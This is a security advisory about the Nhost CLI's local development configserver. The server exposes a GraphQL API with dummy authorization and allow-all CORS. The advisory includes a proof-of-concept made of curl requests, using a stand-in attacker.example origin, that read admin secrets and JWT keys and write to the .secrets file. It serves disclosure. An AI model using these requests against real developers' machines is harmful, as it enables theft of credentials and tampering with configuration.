Authentication mechanism absence or evasion In github.com/nhost/nhost
Description
Nhost CLI local configserver allows cross-origin unauthenticated read/write access to local development configuration and secrets ### Summary The hidden nhost configserver used by nhost dev exposes the Mimir GraphQL API with dummy authorization directives and permissive CORS. When a developer is running the local development environment, any process that can reach the developer's localhost service, including a web page loaded from an arbitrary origin, can query the configserver for local Nhost configuration and secrets and can mutate the local .secrets file. This impacts developers using nhost dev: project admin secrets, JWT signing keys, webhook secrets, Grafana credentials, and custom environment variables can be read, and attacker-controlled secrets can be written to the local development project. ### Details The CLI registers a hidden configserver command in cli/main.go:39 and cli/main.go:41. That command is used as the local development configserver image in nhost dev: cli/cmd/dev/up.go:176 through cli/cmd/dev/up.go:200 select nhost/cli:<version> as the configserver image, and cli/dockercompose/configserver.go:80 through cli/dockercompose/configserver.go:84 run it with the configserver command. The generated development dashboard receives the configserver and logs GraphQL URLs in public client-side environment variables at cli/dockercompose/compose.go:347 through cli/dockercompose/compose.go:358. The configserver intentionally loads the local project files into Mimir's GraphQL resolver in cli/cmd/configserver/configserver.go:143 through cli/cmd/configserver/configserver.go:156. However, the authorization directives passed to graph.SetupRouter are no-ops: - cli/cmd/configserver/configserver.go:83 through cli/cmd/configserver/configserver.go:89 define dummyMiddleware, which calls the next resolver without checking app visibility. - cli/cmd/configserver/configserver.go:91 through cli/cmd/configserver/configserver.go:98 define dummyMiddleware2, which calls the next resolver without checking roles. - cli/cmd/configserver/configserver.go:161 through cli/cmd/configserver/configserver.go:170 pass those dummy directive handlers and cors.Default() to the GraphQL router. The default rs/cors configuration allows all origins when no AllowedOrigins are specified: vendor/github.com/rs/cors/cors.go:163 through vendor/github.com/rs/cors/cors.go:167, and vendor/github.com/rs/cors/cors.go:248 through vendor/github.com/rs/cors/cors.go:249 show Default() uses Options{}. A browser preflight from an arbitrary origin receives Access-Control-Allow-Origin: *. The exposed GraphQL schema includes sensitive queries and mutations: - vendor/github.com/nhost/be/services/mimir/schema/schema.graphqls:41 through vendor/github.com/nhost/be/services/mimir/schema/schema.graphqls:57 expose configRawJSON, config, and appSecrets by app ID. appSecrets is protected only by @hasAppVisibility, which the configserver replaces with the no-op dummyMiddleware. - vendor/github.com/nhost/be/services/mimir/schema/schema.graphqls:117 through vendor/github.com/nhost/be/services/mimir/schema/schema.graphqls:128 expose insertSecret, updateSecret, and deleteSecret, also protected only by the no-op @hasAppVisibility directive. - vendor/github.com/nhost/be/services/mimir/graph/q_app_secrets.go:10 through vendor/github.com/nhost/be/services/mimir/graph/q_app_secrets.go:30 return the app's secrets. - vendor/github.com/nhost/be/services/mimir/graph/q_config_raw_json.go:12 returns raw JSON for the app configuration, which includes sensitive fields such as Hasura admin secrets and JWT signing keys in local development config. - vendor/github.com/nhost/be/services/mimir/graph/m_insert_secret.go:11 through vendor/github.com/nhost/be/services/mimir/graph/m_insert_secret.go:47 append attacker-supplied secrets and call plugin UpdateSecrets. - cli/cmd/configserver/local.go:164 through cli/cmd/configserver/local.go:175 marshal the new secrets and write them to the configured local secrets file with os.WriteFile. Because the local configserver uses a fixed zero UUID app ID for the local app (cli/cmd/configserver/local.go:134) and does not require cookies, tokens, or admin headers, a request only needs the known GraphQL endpoint and app ID. Candidate score: 14/14. - Reachability: 2 — reachable in the documented local development path using nhost dev and directly through the hidden configserver command. - Attacker control: 2 — GraphQL query and mutation bodies are fully attacker-controlled. - Privilege required: 2 — no authentication or local Nhost privileges are required beyond network/browser reachability to the developer's local configserver. - Sink impact: 2 — sensitive secret read and local secrets file write. - Mitigation weakness: 2 — role/app-visibility directives are replaced with no-op handlers, and CORS permits all origins. - Default exposure: 2 — enabled by the common local development setup. - Safe reproduction feasibility: 2 — confirmed locally with disposable fixture files. ### PoC The following proof uses only localhost and disposable temporary files. It does not contact external systems and does not read or modify real project secrets. 1. Start a configserver instance against temporary local files: sh tmpdir=$(mktemp -d) config="$tmpdir/nhost.toml" secrets="$tmpdir/.secrets" cat > "$config" <<'EOF' [hasura] adminSecret = 'local-test-admin-secret' webhookSecret = 'local-test-webhook-secret' [[hasura.jwtSecrets]] type = 'HS256' key = 'local-test-jwt-secret' [observability] [observability.grafana] adminPassword = 'local-test-grafana-password' EOF cat > "$secrets" <<'EOF' localProofSecret = 'LOCAL_PROOF_SECRET_VALUE' EOF port=18088 go run ./cli configserver \ --bind "127.0.0.1:$port" \ --storage-local-config-path "$config" \ --storage-local-secrets-path "$secrets" 2. From another shell, show that a browser-style preflight from an arbitrary origin is accepted: sh curl -sS -i -X OPTIONS \ -H 'Origin: https://attacker.example' \ -H 'Access-Control-Request-Method: POST' \ -H 'Access-Control-Request-Headers: content-type' \ "http://127.0.0.1:18088/v1/configserver/graphql" Observed proof output in this environment: text HTTP/1.1 204 No Content Access-Control-Allow-Headers: content-type Access-Control-Allow-Methods: POST Access-Control-Allow-Origin: * Vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers 3. Read local development secrets without any authentication: sh curl -sS -i \ -H 'Origin: https://attacker.example' \ -H 'Content-Type: application/json' \ --data '{"query":"query { appSecrets(appID: \"00000000-0000-0000-0000-000000000000\") { name value } }"}' \ "http://127.0.0.1:18088/v1/configserver/graphql" Observed proof output in this environment: text HTTP/1.1 200 OK Access-Control-Allow-Origin: * {"data":{"appSecrets":[{"name":"localProofSecret","value":"LOCAL_PROOF_SECRET_VALUE"}]}} 4. Read sensitive local configuration without any authentication: sh curl -sS -i \ -H 'Origin: https://attacker.example' \ -H 'Content-Type: application/json' \ --data '{"query":"query { configRawJSON(appID: \"00000000-0000-0000-0000-000000000000\", resolve: false) }"}' \ "http://127.0.0.1:18088/v1/configserver/graphql" Observed proof output in this environment: text HTTP/1.1 200 OK Access-Control-Allow-Origin: * {"data":{"configRawJSON":"{\"hasura\":{\"adminSecret\":\"local-test-admin-secret\",\"jwtSecrets\":[{\"key\":\"local-test-jwt-secret\",\"type\":\"HS256\"}],\"webhookSecret\":\"local-test-webhook-secret\"},\"observability\":{\"grafana\":{\"adminPassword\":\"local-test-grafana-password\"}}}"}} 5. Mutate the local .secrets file without any authentication: sh curl -sS -i \ -H 'Origin: https://attacker.example' \ -H 'Content-Type: application/json' \ --data '{"query":"mutation { insertSecret(appID: \"00000000-0000-0000-0000-000000000000\", secret: { name: \"INJECTED_BY_UNAUTHENTICATED_REQUEST\", value: \"SAFE_LOCAL_MARKER\" }) { name value } }"}' \ "http://127.0.0.1:18088/v1/configserver/graphql" grep -E 'INJECTED_BY_UNAUTHENTICATED_REQUEST|SAFE_LOCAL_MARKER' "$secrets" Observed proof output in this environment: text HTTP/1.1 200 OK Access-Control-Allow-Origin: * {"data":{"insertSecret":{"name":"INJECTED_BY_UNAUTHENTICATED_REQUEST","value":"SAFE_LOCAL_MARKER"}}} INJECTED_BY_UNAUTHENTICATED_REQUEST = 'SAFE_LOCAL_MARKER' 6. Cleanup: sh # Stop the configserver process, then remove the disposable fixture directory. rm -rf "$tmpdir" ### Impact An attacker who can cause a developer to visit a web page while nhost dev is running can use JavaScript from that page to send cross-origin GraphQL requests to the local Nhost configserver. The attacker can read local development secrets and configuration, including Hasura admin secrets, JWT signing keys, webhook secrets, Grafana credentials, and custom environment variables stored in .secrets. The attacker can also mutate the local .secrets file, which can alter subsequent local development behavior and potentially poison local configuration consumed by services. This is not a hosted-production unauthenticated endpoint vulnerability; it affects the local developer environment. The realistic attacker model is a malicious web page, local unprivileged process, or same-network process that can reach the developer's local configserver route while the development stack is running. ### Remediation Addressed in
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
go | 0.0.0-20260518172022-e407511627d2 |
Aliases
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